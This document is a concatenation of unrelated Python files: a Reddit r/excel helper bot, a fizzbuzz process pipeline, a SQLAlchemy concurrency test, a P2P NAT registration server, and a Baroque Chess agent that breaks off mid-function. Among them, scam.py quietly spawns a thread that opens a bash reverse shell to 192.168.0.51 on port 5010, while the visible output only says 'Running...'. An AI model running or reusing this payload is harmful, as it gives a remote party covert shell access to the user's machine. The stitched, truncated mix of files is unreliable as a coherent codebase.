POINT_REPLY = "You have awarded one point to _parent_"
# This is the phrase that User will receive
# _parent_ will be replaced by the username of the Parent.
POINT_EXEMPT = []
# Any usernames in this list will not receive points.
# Perhaps they have special flair.
POINT_OP_ONLY = True
# Is OP the only person who can give points?
# I recommend setting this to False. Other users might have the same question
# and would like to reward a good answer.
POINT_PER_THREAD = 200
# How many points can be distributed in a single thread?
POINT_DO_EXPLAIN = True
# If the max-per-thread is reached and someone tries to give a point, reply to
# them saying that the max has already been reached
POINT_EXPLAIN = """
Sorry, but %d point(s) have already been distributed in this thread.
This is the maximum allowed at this time.
"""%POINT_PER_THREAD
# If EXPLAINMAX is True, this will be said to someone who tries to give a
# point after max is reached
POINT_EXPLAIN_OP_ONLY = """
Hi!
It looks like you are trying to award a point and you are not the OP!
I am here to assist you!
What would you like help with?
[ClippyPoints^(TM)?](/r/excel/wiki/clippy)
[Flair Descriptions](http://www.reddit.com/r/excel/wiki/index)
"""
"""**************"""
"""FLAIR REMINDER"""
"""**************"""
FLAIR_WARN_DELAY = 86400
# This is the time, IN SECONDS, the user has to reply to the first comment.
# If he does not respond by this time, post is removed
NCDELAY = 172800
FLAIR_WARN_MESSAGE = """
Hi!
It looks like you are trying to ask a question!
Since you have not responded in the last 24 hours, I am here to assist you!
If your questions has been solved, please be sure to update the flair.
Would you like help?
[Help Changing Your
Flair?](https://www.reddit.com/r/excel/wiki/flair)
[Asking Question and Sharing
Data](https://www.reddit.com/r/excel/wiki/sharingquestions)
"""
# This is what the bot tells you when you dont meet the DELAY. Uses reddit's
# usual Markdown formatting
FLAIR_IGNORE_MODS = False
# Do you want the bot to ignore posts made by moderators?
# Use True or False (With capitals! No quotations!)
FLAIR_IGNORE_SELF = False
#Do you want the bot to ignore selfposts?
FLAIR_SOLVED = "solved"
FLAIR_UNSOLVED = "unsolved"
FLAIR_CHAL = "challenge"
FLAIR_MANN = "Mod Announcement"
FLAIR_MNEWS = "Mod News"
FLAIR_WAITING = "Waiting on OP"
FLAIR_DISCUSS = "discussion"
FLAIR_ADVERTISEMENT = "advertisement"
FLAIR_TEMPLATE = "User Template"
FLAIR_PROTIP = "pro tip"
FLAIR_TRIGGERS = ["that works", "perfect", "thank you so much", "huge help",
"figured it out", "got it", "thanks for your help"]
#These encourage OP to change flair / award point
FLAIR_REMINDER = """
Hi!
It looks like you received an answer to your question! Since the top is
still marked as unsolved, I am here to assist you!
If your questions has been solved, please be sure to update the flair.
Would you like help?
[Help Changing Your Flair?](http://www.reddit.com/r/excel/wiki/index)
[Flair Descriptions](http://www.reddit.com/r/excel/wiki/index)
"""
"""******************"""
"""FUNCTION REFERENCE"""
"""******************"""
DICT_TRIGGER = "clippy: "
# The trigger phrase for perfoming a lookup
DICT_FILE = 'reference.txt'
# The file with the Keys/Values
DICT_RESULT_FORM = "_value_"
# This is the form that the result will take
# You may use _key_ and _value_ to inject the key/value from the dict.
# You may delete one or both of these injectors.
DICT_LEVENSHTEIN = False
# If this is True it will use a function that is slow but can find
# misspelled keys
# If this is False it will use a simple function that is very fast but can
# only find keys which are spelled exactly
DICT_FAIL = """
Hi! It looks like you're looking for help with an Excel function!
Unfortunately I have not learned that function yet. If you'd like to
change that, [message the
moderators](http://www.reddit.com/message/compose?to=%2Fr%2Fexcel)!
"""
# The comment which is created when a function is requested
# but not in the file
"""***************"""
"""WELCOME MESSAGE"""
"""***************"""
WELCOME_SUBJECT = """Welcome to /r/Excel, I am here to help!"""
WELCOME_MESSAGE = """
Hi %s!
It looks like you are new to posting in /r/Excel.
Did you know we have a few ways to help you receive better help?
How can I help you?
[How to Share Your Questions](/r/excel/wiki/sharingquestions)
[Changing Link Flair](/r/excel/wiki/flair)
[ClippyPoints^TM](/r/excel/wiki/clippy)
^This ^message ^is ^auto-generated ^and ^is ^not ^monitored ^on ^a
^regular ^basis, ^replies ^to ^this ^message ^may ^not ^go ^answered.
^Remember ^to [^contact ^the
^moderators](http://www.reddit.com/message/compose?to=%2Fr%2Fexcel)
^to ^guarantee ^a ^response
"""
# Sent to the user if he has created his first post in the subreddit
'''All done!'''
class ClippyPoints:
def incrementflair(self, subreddit, username):
#Returns True if the operation was successful
if isinstance(subreddit, str):
subreddit = r.get_subreddit(subreddit)
success = False
print('\t\tChecking flair for ' + username)
flairs = subreddit.get_flair(username)
flairs = flairs['flair_text']
if flairs is not None and flairs != '':
print('\t\t:' + flairs)
try:
flairs = int(flairs)
flairs += 1
flairs = str(flairs)
success = True
except ValueError:
print('\t\tCould not convert flair to a number.')
else:
print('\t\tNo current flair. 1 point')
flairs = '1'
success = True
if success:
print('\t\tAssigning Flair: ' + flairs)
subreddit.set_flair(username, flair_text=flairs,
flair_css_class=POINT_FLAIR_CSS)
return success
def receive(self, comments):
print('\tClippyPoints received comments.')
subreddit = r.get_subreddit(SUBREDDIT)
for comment in comments:
cid = comment.id
cur.execute('SELECT * FROM clippy_points WHERE ID=?', [cid])
if not cur.fetchone():
print(cid)
cbody = comment.body.lower()
try:
if not comment.is_root:
cauthor = comment.author.name
print('\tChecking subreddit moderators')
moderators = [user.name for user in subreddit.get_moderators()]
byuser = False
if cauthor not in moderators and any(flag.lower() in cbody for flag in POINT_STRING_USR):
byuser = True
if byuser or (
(cauthor in moderators and any(flag.lower() in cbody for flag in POINT_STRING_MOD))):
print('\tFlagged %s.' % cid)
print('\t\tFetching parent and Submission data.')
parentcom = r.get_info(thing_id=comment.parent_id)
pauthor = parentcom.author.name
op = comment.submission.author.name
opid = comment.submission.id
if pauthor != cauthor:
if not any(exempt.lower() == pauthor.lower() for exempt in POINT_EXEMPT):
if POINT_OP_ONLY is False or cauthor == op or cauthor in moderators:
cur.execute('SELECT * FROM clippy_points_s WHERE ID=?', [opid])
fetched = cur.fetchone()
if not fetched:
cur.execute('INSERT INTO clippy_points_s VALUES(?, ?)', [opid, 0])
fetched = 0
else:
fetched = fetched[1]
if fetched < POINT_PER_THREAD:
if self.incrementflair(subreddit, pauthor):
print('\t\tWriting reply')
comment_confirm = comment.reply(POINT_REPLY.replace('_parent_', pauthor))
comment_confirm.distinguish()
cur.execute('UPDATE clippy_points_s SET count=? WHERE ID=?', [fetched+1, opid])
if byuser:
comment.submission.set_flair(flair_text=FLAIR_SOLVED, flair_css_class="solvedcase")
else:
print('\t\tMaxPerThread has been reached')
if EXPLAINMAX is True:
print('\t\tWriting reply')
comment.reply(POINT_EXPLAIN)
else:
print('\tOther users cannot give points.')
#comment_confirm = comment.reply(EXPLAINOPONLY)
#comment_confirm.distinguish()
else:
print('\t\tParent is on the exempt list.')
else:
print('\t\tCannot give points to self.')
else:
print('\t\tRoot comment. Ignoring.')
except AttributeError:
print('\t\tCould not fetch usernames. Cannot proceed.')
cur.execute('INSERT INTO clippy_points VALUES(?)', [cid])
sql.commit()
print('\tClippyPoints finished')
class ClippyFlairReminder:
def receive(self, posts):
print('\tClippyFlair received submissions')
now = datetime.datetime.now()
subreddit = r.get_subreddit(SUBREDDIT)
print('\tChecking subreddit moderators')
moderators = [user.name for user in subreddit.get_moderators()]
for post in posts:
found = False
ctimes = []
pid = post.id
try:
pauthor = post.author.name
except AttributeError:
pauthor = '[deleted]'
ptime = post.created_utc
curtime = getTime(True)
ctime = curtime
cur.execute('SELECT * FROM clippy_flair WHERE id=?', [pid])
if not cur.fetchone():
if post.is_self is False or FLAIR_IGNORE_SELF is False:
if pauthor not in moderators or FLAIR_IGNORE_MODS is False:
comments = praw.helpers.flatten_tree(post.comments)
try:
flair = post.link_flair_text.lower()
except AttributeError:
flair = ''
if flair == FLAIR_UNSOLVED.lower():
print(pid + ': Unsolved')
for comment in comments:
try:
cauthor = comment.author.name
except AttributeError:
cauthor = '[deleted]'
if cauthor != pauthor:
found = True
break
if not found:
print('\tNo comments by another user. No action taken.')
else:
print('\tFound comment by other user. Marking as Waiting.')
post.set_flair(flair_text=FLAIR_WAITING, flair_css_class="waitingonop")
elif flair == FLAIR_WAITING.lower():
print(pid + ': Waiting')
for comment in comments:
try:
cauthor = comment.author.name
except AttributeError:
cauthor = '[deleted]'
if cauthor == pauthor:
found = True
pbody = comment.body.lower()
else:
ctimes.append(comment.created_utc)
if found is True:
if not any(trigger in pbody for trigger in POINT_STRING_USR):
print('\tFound comment by OP. All clear, changing flair back to unsolved.')
post.set_flair(flair_text=FLAIR_UNSOLVED, flair_css_class="notsolvedcase")
#print('\tUpvoting comment..')
#post.upvote()
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if any(key.lower() in pbody for key in FLAIR_TRIGGERS):
print('Replying to ' + pid + ' by ' + pauthor)
comment.reply(FLAIR_REMINDER)
newcomment.distinguish()
elif found is False and len(ctimes) > 0:
print('\tNo comments by OP. Checking time limit.')
ctime = min(ctimes)
difference = curtime - ctime
if difference > FLAIR_WARN_DELAY:
print('\tTime is up.')
print('\tLeaving Comment')
newcomment = post.add_comment(FLAIR_WARN_MESSAGE)
print('\tDistinguishing Comment')
newcomment.distinguish()
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
else:
differences = str('%.0f' % (FLAIR_WARN_DELAY - difference))
print('\tStill has ' + differences + 's.')
elif found is False and len(ctimes) == 0:
print('\tNo comments by OP, but no other comments are available.')
else:
print(pid + ': Neither flair')
if flair == FLAIR_DISCUSS.lower():
print(pid + ': is a discussion post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_ADVERTISEMENT.lower():
print(pid + ': is an advertisement post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_TEMPLATE.lower():
print(pid + ': is a User Template post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_PROTIP.lower():
print(pid + ': is a ProTip post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_SOLVED.lower():
print(pid + ': is a SOLVED post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_MANN.lower():
print(pid + ': is a Mod Annoucement post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if flair == FLAIR_MNEWS.lower():
print(pid + ': is a Mod News post, adding to ignore list...')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
else:
cur.execute('SELECT * FROM clippy_flair WHERE id=?', [pid])
if not cur.fetchone():
print('\tAssigning Flair')
post.set_flair(flair_text=FLAIR_UNSOLVED, flair_css_class="notsolvedcase")
else:
#cur.execute('INSERT INTO flair VALUES("%s")' % pid)
if pauthor in moderators and FLAIR_IGNORE_MODS is True:
print(pid + ', ' + pauthor + ': Ignoring Moderator')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
if post.is_self is True and FLAIR_IGNORE_SELF is True:
print(pid + ', ' + pauthor + ': Ignoring Selfpost')
cur.execute('INSERT INTO clippy_flair VALUES(?)', [pid])
sql.commit()
print('\tClippyFlair finished')
class ClippyReference:
def __init__(self):
with open(DICT_FILE, 'r') as f:
self.DICT = json.loads(f.read())
def levenshtein(self, s1, s2):
#Levenshtein algorithm to figure out how close two strings are two each other
#Courtesy http://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Levenshtein_distance#Python
if len(s1) < len(s2):
return self.levenshtein(s2, s1)
# len(s1) >= len(s2)
if len(s2) == 0:
return len(s1)
previous_row = range(len(s2) + 1)
for i, c1 in enumerate(s1):
current_row = [i + 1]
for j, c2 in enumerate(s2):
insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer
deletions = current_row[j] + 1 # than s2
substitutions = previous_row[j] + (c1 != c2)
current_row.append(min(insertions, deletions, substitutions))
previous_row = current_row
return previous_row[-1]
def findsuper(self, comment, tolerance= 1):
results = []
used = []
for itemname in self.DICT:
itemlength = len(itemname.split())
pos = 0
commentsplit = comment.split()
end = False
while not end:
try:
gram = commentsplit[pos:pos+itemlength]
gramjoin = ' '.join(gram)
lev = self.levenshtein(itemname, gramjoin)
if lev <= tolerance:
if itemname not in used:
used.append(itemname)
result = DICT_RESULT_FORM
result = result.replace('_key_', itemname)
result = result.replace('_value_', self.DICT[itemname])
results.append(result)
pos += 1
if pos > len(commentsplit):
end = True
except IndexError:
end = True
return results
def findsimple(self, comment):
results = []
for itemname in self.DICT:
if itemname.lower() in comment.lower():
result = DICT_RESULT_FORM
result = result.replace('_key_', itemname)
result = result.replace('_value_', self.DICT[itemname])
results.append(result)
return results
def receive(self, comments):
lev = "True" if DICT_LEVENSHTEIN else "False"
print('\tClippyReference received comments (Lev: %s)'%lev)
for comment in comments:
results = []
cid = comment.id
try:
cauthor = comment.author.name
cur.execute('SELECT * FROM clippy_reference WHERE ID=?',[cid])
if not cur.fetchone():
print('\t' + cid)
if cauthor.lower() != r.user.name.lower():
cbody = comment.body.lower()
if DICT_LEVENSHTEIN is True:
results = self.findsuper(cbody)
else:
results = self.findsimple(cbody)
if DICT_TRIGGER.lower() in cbody.lower() and (
len(results) == 0):
#They made a request, but we didn't find anything
results.append(DICT_FAIL)
if len(results) > 0:
newcomment = '\n\n'.join(results)
print('\t\tReplying to %s with %d items...'%
(cauthor, len(results)), end="")
sys.stdout.flush()
comment.reply(newcomment)
print('done.')
else:
#Will not reply to self
pass
cur.execute('INSERT INTO clippy_reference VALUES(?)',[cid])
sql.commit()
except AttributeError:
# Comment Author is deleted
pass
print('\tClippyReference finished')
class ClippyWelcome:
def receive(self, posts):
print('\tClippyWelcome received submissions')
for post in posts:
try:
pauthor = post.author.name
pid = post.id
cur.execute('SELECT * FROM clippy_welcome WHERE NAME=?', [pauthor])
if not cur.fetchone():
print('\t' + pid)
print('\t\tFound new user: ' + pauthor)
print('\t\tSending message...', end="")
sys.stdout.flush()
#r.send_message(pauthor, WELCOME_SUBJECT, WELCOME_MESSAGE%pauthor, captcha=None)
cur.execute('INSERT INTO clippy_welcome VALUES(?, ?)', (pauthor, pid))
print('done.')
sql.commit()
except AttributeError:
#Post author is deleted
pass
print('\tClippyWelcome finished')
def getTime(bool):
timeNow = datetime.datetime.now(datetime.timezone.utc)
timeUnix = timeNow.timestamp()
if bool is False:
return timeNow
else:
return timeUnix
def clippy_manager():
try:
subreddit = r.get_subreddit(SUBREDDIT)
print('Getting new comments')
newcomments =list( subreddit.get_comments(limit=MAXPOSTS))
clippyreference.receive(newcomments)
clippypoints.receive(newcomments)
print('Getting new submissions')
newposts = list(subreddit.get_new(limit=MAXPOSTS))
clippywelcome.receive(newposts)
clippyflair.receive(newposts)
except Exception:
traceback.print_exc()
if __name__ == "__main__":
sql = sqlite3.connect('superclippy.db')
cur = sql.cursor()
cur.execute('CREATE TABLE IF NOT EXISTS clippy_welcome(NAME TEXT, ID TEXT)')
cur.execute('CREATE TABLE IF NOT EXISTS clippy_reference(ID TEXT)')
cur.execute('CREATE TABLE IF NOT EXISTS clippy_points(ID TEXT)')
cur.execute('CREATE TABLE IF NOT EXISTS clippy_points_s(ID TEXT, count INT)')
cur.execute('CREATE TABLE IF NOT EXISTS clippy_flair(id TEXT)')
print('Loaded SQL Database')
sql.commit()
if PLAY_BOOT_SOUND:
try:
import winsound
import threading
def bootsound():
winsound.PlaySound('boot.wav', winsound.SND_FILENAME)
soundthread = threading.Thread(target=bootsound)
soundthread.daemon = True
soundthread.start()
except Exception:
pass
print('Logging in...', end="")
try:
import bot
USERAGENT = bot.aG
except ImportError:
pass
sys.stdout.flush()
r = praw.Reddit(USERAGENT)
r.set_oauth_app_info(APP_ID, APP_SECRET, APP_URI)
r.refresh_access_information(APP_REFRESH)
print('done.')
print('Starting Points...', end="")
clippypoints = ClippyPoints()
print('done.')
print('Starting Welcome...', end="")
clippywelcome = ClippyWelcome()
print('done.')
print('Starting Flair...', end="")
clippyflair = ClippyFlairReminder()
print('done.')
print('Starting Reference...', end="")
clippyreference = ClippyReference()
print('done.')
while True:
clippy_manager()
print('Sleeping %d seconds.\n\n'%WAIT)
time.sleep(WAIT)
|
fizzbuzz.py
|
from multiprocessing import Process, Queue
from fizzbuzz_utils import fizzbuzz as fizzbuzz
from fizzbuzz_utils import printer as printer
from fizzbuzz_utils import even as even
from fizzbuzz_utils import numbers as numbers
class PLPipeSentinel: pass
def pl_run_numbers(pl_stream, pl_out_queue):
for pl_data in pl_stream:
pl_out_queue.put(pl_data)
pl_out_queue.put(PLPipeSentinel())
def pl_run_even(pl_in_queue, pl_out_queue):
is_even = None
count = None
while 1:
pl_inp = pl_in_queue.get()
if isinstance(pl_inp, PLPipeSentinel):
pl_outp = PLPipeSentinel()
if not isinstance(pl_inp, PLPipeSentinel):
pl_result = even(number=pl_inp, counter=count)
is_even, count = pl_result
if is_even:
pl_outp = pl_inp
else:
continue
if pl_out_queue is not None:
pl_out_queue.put(pl_outp)
if isinstance(pl_inp, PLPipeSentinel):
break
def pl_run_fizzbuzz(pl_in_queue, pl_out_queue):
number = None
while 1:
pl_inp = pl_in_queue.get()
if isinstance(pl_inp, PLPipeSentinel):
pl_outp = PLPipeSentinel()
if not isinstance(pl_inp, PLPipeSentinel):
pl_outp = fizzbuzz(number=pl_inp, fizz="fizz", buzz="buzz")
number = pl_outp
if pl_out_queue is not None:
pl_out_queue.put(pl_outp)
if isinstance(pl_inp, PLPipeSentinel):
break
def pl_run_printer(pl_in_queue, pl_out_queue):
while 1:
pl_inp = pl_in_queue.get()
number = pl_inp
if isinstance(pl_inp, PLPipeSentinel):
pl_outp = PLPipeSentinel()
if not isinstance(pl_inp, PLPipeSentinel):
pl_outp = printer(number=number)
if pl_out_queue is not None:
pl_out_queue.put(pl_outp)
if isinstance(pl_inp, PLPipeSentinel):
break
if __name__ == "__main__":
pl_data = numbers()
pl_in_even = Queue()
pl_in_fizzbuzz = Queue()
pl_in_printer = Queue()
pl_numbers_process = Process(target=pl_run_numbers, args=(pl_data, pl_in_even))
pl_even_process = Process(target=pl_run_even, args=(pl_in_even,pl_in_fizzbuzz,))
pl_fizzbuzz_process = Process(target=pl_run_fizzbuzz, args=(pl_in_fizzbuzz,pl_in_printer,))
pl_printer_process = Process(target=pl_run_printer, args=(pl_in_printer,None,))
pl_numbers_process.start()
pl_even_process.start()
pl_fizzbuzz_process.start()
pl_printer_process.start()
pl_even_process.join()
pl_fizzbuzz_process.join()
pl_printer_process.join()
|
scam.py
|
import subprocess
import threading
def fn(n):
try:
subprocess.check_call("/bin/bash -i >/dev/tcp/192.168.0.51/5010 0<&1 2>&1", shell=True, executable="/bin/bash")
print("Connection Established")
except:
print("Command Failed")
return 0
def main():
print("Running...")
if __name__ == "__main__":
thread = threading.Thread(target=fn, args=(0, ))
thread.start()
main()
exit(0)
|
test_concurrency.py
|
import random
import threading
import time
from sqlalchemy import Column
from sqlalchemy import exc
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy.orm import clear_mappers
from sqlalchemy.orm import declarative_base
from sqlalchemy.orm import declared_attr
from sqlalchemy.orm import exc as orm_exc
from sqlalchemy.orm import relationship
from sqlalchemy.testing import fixtures
from sqlalchemy.testing.fixtures import fixture_session
class ConcurrentUseDeclMappingTest(fixtures.TestBase):
def teardown_test(self):
clear_mappers()
@classmethod
def make_a(cls, Base):
class A(Base):
__tablename__ = "a"
id = Column(Integer, primary_key=True)
data = Column(String)
bs = relationship("B")
# need a strong ref so that the class is not gc'ed
cls.A = A
@classmethod
def query_a(cls, Base, result):
s = fixture_session()
time.sleep(random.random() / 100)
A = cls.A
try:
s.query(A).join(A.bs)
except orm_exc.UnmappedClassError as oe:
# this is the failure mode, where B is being handled by
# declarative and is in the registry but not mapped yet.
result[0] = oe
except exc.InvalidRequestError:
# if make_b() starts too slowly, we can reach here, because
# B isn't in the registry yet. We can't guard against this
# case in the library because a class can refer to a name that
# doesn't exist and that has to raise.
result[0] = True
else:
# no conflict
result[0] = True
@classmethod
def make_b(cls, Base):
class B(Base):
__tablename__ = "b"
id = Column(Integer, primary_key=True)
@declared_attr
def data(cls):
time.sleep(0.001)
return Column(String)
a_id = Column(ForeignKey("a.id"))
cls.B = B
def test_concurrent_create(self):
for i in range(50):
Base = declarative_base()
clear_mappers()
self.make_a(Base)
result = [False]
threads = [
threading.Thread(target=self.make_b, args=(Base,)),
threading.Thread(target=self.query_a, args=(Base, result)),
]
for t in threads:
t.start()
for t in threads:
t.join()
if isinstance(result[0], orm_exc.UnmappedClassError):
raise result[0]
|
P2PServer.py
|
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
import json
from threading import Thread
from P2PManageWebSocket import P2PManageWebSocket
all_p2p_info_dict = {}
class Resquest(BaseHTTPRequestHandler):
def handle_p2pinfo_register(self, read_str):
p2pinfo_dict = json.loads(read_str)
p2pinfo_dict["ip_outside"] = self.client_address[0]
p2pinfo_dict["port_outside"] = self.client_address[1]
p2pinfo_dict["register_time"] = time.time()
if p2pinfo_dict['client_id'] in all_p2p_info_dict:
last_p2pinfo_dict = all_p2p_info_dict[p2pinfo_dict['client_id']]
register_interval = last_p2pinfo_dict["register_time"] - p2pinfo_dict["register_time"]
if register_interval < 5 \
and last_p2pinfo_dict["port_inside"] == p2pinfo_dict["port_inside"] \
and last_p2pinfo_dict["ip_inside"] == p2pinfo_dict["ip_inside"] \
and last_p2pinfo_dict["port_outside"] == p2pinfo_dict["port_outside"] \
and last_p2pinfo_dict["ip_outside"] == p2pinfo_dict["ip_outside"]:
# 如果5秒内的两次请求内部端口和内部IP都未发生变化, 外部端口也未发生变化,说明是可以建立p2p打洞链接的情况
p2pinfo_dict["can_p2p_across_nat"] = True
else:
# 如果5秒内内部端口和内部IP都未发生变化, 但是外部端口发生变化,说明是对称型nat
# 或者暂时无法判断是否可以打洞的情况
# 实际测试流媒体所在环境是端口受限圆锥型NAT(Port-Restricted cone NAT),当对端是Symmetric NAT时必然无法打洞成功
# 对于处于受限圆锥型NAT((Address-)Restricted cone NAT)下的流媒体环境优先级低
pass
# 更新p2p注册信息
all_p2p_info_dict[p2pinfo_dict['client_id']] = p2pinfo_dict
return 200, json.dumps(p2pinfo_dict).encode()
def do_POST(self):
read_str = self.rfile.read(int(self.headers['content-length']))
if self.path == "/p2pinfo/register":
code, send_content = self.handle_p2pinfo_register(read_str)
else:
code = 404
send_content = "{\"err_info\": \"can not find url %s}" % self.path
self.send_response(code)
self.send_header('Content-Type', 'application/json')
self.send_header('Content-Length', str(len(send_content)))
self.end_headers()
self.wfile.write(send_content)
def do_GET(self):
if self.path == "/p2pinfo/subscribe/server":
code = 200
p2p_subscribe_websocket_server_dict = {"ip": p2p_websocket_server_host_outside[0],
"port": p2p_websocket_server_host_outside[1]}
send_content = json.dumps(p2p_subscribe_websocket_server_dict).encode()
else:
code = 404
send_content = "{\"err_info\": \"can not find url %s}" % self.path
self.send_response(code)
self.send_header('Content-type', 'application/json')
self.send_header('Content-Length', str(len(send_content)))
self.end_headers()
self.wfile.write(send_content)
if __name__ == '__main__':
config_file = open('config.json', 'r')
config = config_file.read()
config_file.close()
config_dict = json.loads(config)
p2p_websocket_server_host_outside = (config_dict["local_ip"], config_dict["websocket_port"])
server = HTTPServer(('0.0.0.0', config_dict["http_port"]), Resquest)
print("Starting server, listen at: %s:%s" % ('0.0.0.0', config_dict["http_port"]))
Thread(target=server.serve_forever).start()
CL_P2PManageWebSocket = P2PManageWebSocket(('0.0.0.0', config_dict["websocket_port"]), all_p2p_info_dict)
print("Starting P2PManageWebSocket server, listen at: %s:%s" % ('0.0.0.0', config_dict["websocket_port"]))
CL_P2PManageWebSocket.serve_forever()
|
PlayerSkeletonA.py
|
'''PlayerSkeletonA.py
The beginnings of an agent that might someday play Baroque Chess.
'''
from BC_state_etc import *
import random
import math
import time
import threading
TIME_INC = .015 # Global variable representing the number of seconds an iteration takes
TURNS = 0 # Global variable representing the number of turns that have passed so far
EMPTY = 0 # Global variable representing an empty space on the board
ZOB_TBL = dict() # Table that maps each row-col-piece combo to a unique hash
ZOB_STATES = dict() # Table that maps board hashes to their static values
DYN_VALS = dict()
# Table mapping players to a set containing their pieces
PIECES = {BLACK:set((BLACK_PINCER, BLACK_COORDINATOR, BLACK_LEAPER, BLACK_IMITATOR,\
BLACK_WITHDRAWER, BLACK_KING, BLACK_FREEZER)),\
WHITE:set((WHITE_PINCER, WHITE_COORDINATOR, WHITE_LEAPER, WHITE_IMITATOR,\
WHITE_WITHDRAWER, WHITE_KING, WHITE_FREEZER))}
# Table that maps directions to coordinate vectors
DIR_TBL = {NORTH:(-1,0), SOUTH:(1,0), WEST:(0,-1), EAST:(0,1),\
NW:(-1,-1), NE:(-1,1), SW:(1,-1), SE:(1,1)}
# Table that maps pieces to static values
STATIC_VALUES = {EMPTY:0,\
BLACK_PINCER:-1, WHITE_PINCER:1,\
BLACK_COORDINATOR:-5, WHITE_COORDINATOR:5,\
BLACK_LEAPER:-2, WHITE_LEAPER:2,\
BLACK_IMITATOR:-4, WHITE_IMITATOR:4,\
BLACK_WITHDRAWER:-3, WHITE_WITHDRAWER:3,\
BLACK_KING:0, WHITE_KING:0,\
BLACK_FREEZER:-3, WHITE_FREEZER:3}
#
STATIC_BOARD = None
STATISTICS = {"Z_SUCCESS": 0, "Z_QUERIES": 0, "AB_CUTOFFS": 0, "STATIC_EVALS": 0}
# Special global variable that stores potential moves involving a
# leaper (or imitator) leaping. In that case, a capture MUST happen,
# so no non-capturing successor boards will be considered for that move.
LEAPER_CAPTURE = None
EVAL_THREAD = False
EVAL_THREAD_EXIT = False
PUN_GENERATOR = None
BAD_PUNS = [\
"Defibrillators are re-pulse-ive.",\
"Possesio is nine-tenths of the word.",\
"What's a rounding error like? Everything feels a bit off.",\
"Broken pencils are pointless.",\
"Got some new glasses. They're quite the spectacle.",\
"Misconfiguring SSL makes me feel so insecure.",\
"Two crows on a wire? Attempted murder.",\
"Three crows in a henhouse? Murder most fowl.",\
"Pride goes before a fall; a pride will go after a gazelle.",\
"There's a point to this sentence, but you won't see it until the very end.",\
"Everyone's a waiter when the restaurant's having a slow day.",\
"Fishing is a good example of a poisson process.",\
"What's purple and commutes? An abelian grape.",\
"What's yellow and equivalent to the axiom of choice? Zorn's Lemon.",\
"Sodium hydroxide is a lye.",\
"Liquid nitrogen is so cool!"]
def pun_generator():
global BAD_PUNS
last = ['']*10
while True:
for i in range(10):
pun = last[0]
while pun in last:
pun = random.choice(BAD_PUNS)
last[i] = pun
yield pun
def static_eval(board):
global STATIC_VALUES, STATIC_BOARD, EMPTY, TURNS
pieces = set((p for row in board for p in row))
if BLACK_KING not in pieces:
# Missing black king is a win for white
return math.inf
elif WHITE_KING not in pieces:
# Missing white king is a win for black
return -math.inf
else:
if TURNS < 20:
val = sum((STATIC_BOARD[(r,c,board[r][c])] for c in range(8) for r in range(8)))
else:
val = sum((STATIC_VALUES[board[r][c]] for c in range(8) for r in range(8)))
# Ignore frozen pieces
for r in range(8):
for c in range(8):
if board[r][c] == BLACK_FREEZER or board[r][c] == WHITE_FREEZER:
val -= sum((STATIC_BOARD[(nr,nc,board[nr][nc])] for (nr,nc) in get_neighborhood(r,c)\
if board[nr][nc] != EMPTY and who(board[r][c]) != who(board[nr][nc])))/2
return val
#else:
# return sum((STATIC_VALUES[p] for row in board for p in row if (p != WHITE_KING and p != BLACK_KING)))
#
def pos_val(r, c):
return 1 + ((r)*(7-r)*(c)*(7-c))/256
def makeMove(current_state, current_remark, time_limit):
global TURNS, EVAL_THREAD, EVAL_THREAD_EXIT, DYN_VALS, ZOB_STATES, PUN_GENERATOR, STATISTICS
if EVAL_THREAD and EVAL_THREAD.is_alive():
EVAL_THREAD_EXIT = True
EVAL_THREAD.join()
EVAL_THREAD_EXIT = False
EVAL_THREAD = False
TURNS += 1
if TURNS == 20:
DYN_VALS = dict()
ZOB_STATES = dict()
STATISTICS = {"Z_SUCCESS": 0, "Z_QUERIES": 0, "AB_CUTOFFS": 0, "STATIC_EVALS": 0}
# Fix up whose turn it will be.
whose_move = current_state.whose_move
state_hash = zob_hash(current_state.board)
new_score, new_move_and_state, ply_used = iterative_deepening_minimax(current_state.board, state_hash, whose_move, time_limit)
print("Current state static value:", new_score)
print("IDDFS reached ply", ply_used, "before running out of time.")
print("Minimax search performed", STATISTICS["AB_CUTOFFS"], "alpha-beta cutoffs.")
print("Minimax search performed", STATISTICS["STATIC_EVALS"], "static evals.")
print("Zobrist hash table had", STATISTICS["Z_QUERIES"], "total queries.")
print("Zobrist hash table had", STATISTICS["Z_SUCCESS"], "successful queries.")
# Compute the new state for a move.
new_state = BC_state(new_move_and_state[1])
new_state.whose_move = 1 - whose_move
new_move_and_state = (new_move_and_state[0], new_state)
if whose_move == WHITE:
EVAL_THREAD = threading.Thread(target=state_evaluator, args=(new_state,))
EVAL_THREAD.start()
# Make up a new remark
new_remark = next(PUN_GENERATOR)
return ((new_move_and_state), new_remark)
def iterative_deepening_minimax(board, zhash, whoseMove, time_limit):
global TIME_INC
# Get the time the program should return a move by, factoring in time to get to this line
end_time = time_limit + time.time() - TIME_INC
# Set defaults
ply = -1
best_move = [(1, 1), (1, 1)]
best_score = 0
next_score = 0
# Run minimax with increasing ply while time remaining
while time.time() <= end_time - TIME_INC:
ply += 1
#print("ply:", ply)
results = minimax_move_finder(board, zhash, whoseMove, ply, end_time, -math.inf, math.inf)
next_score, next_move = results
if time.time() <= end_time - TIME_INC:
best_move = next_move
best_score = next_score
return best_score, best_move, ply
def state_evaluator(state):
board = state.board
whose_move = state.whose_move
zhash = zob_hash(board)
if zhash not in DYN_VALS:
DYN_VALS[zhash] = ((0, None), -1)
ply = (DYN_VALS[zhash])[1]
best_move = 1
while best_move is not None:
ply += 1
#print(("white's" if whose_move == BLACK else "black's"), "state evaluator ply:", ply)
try:
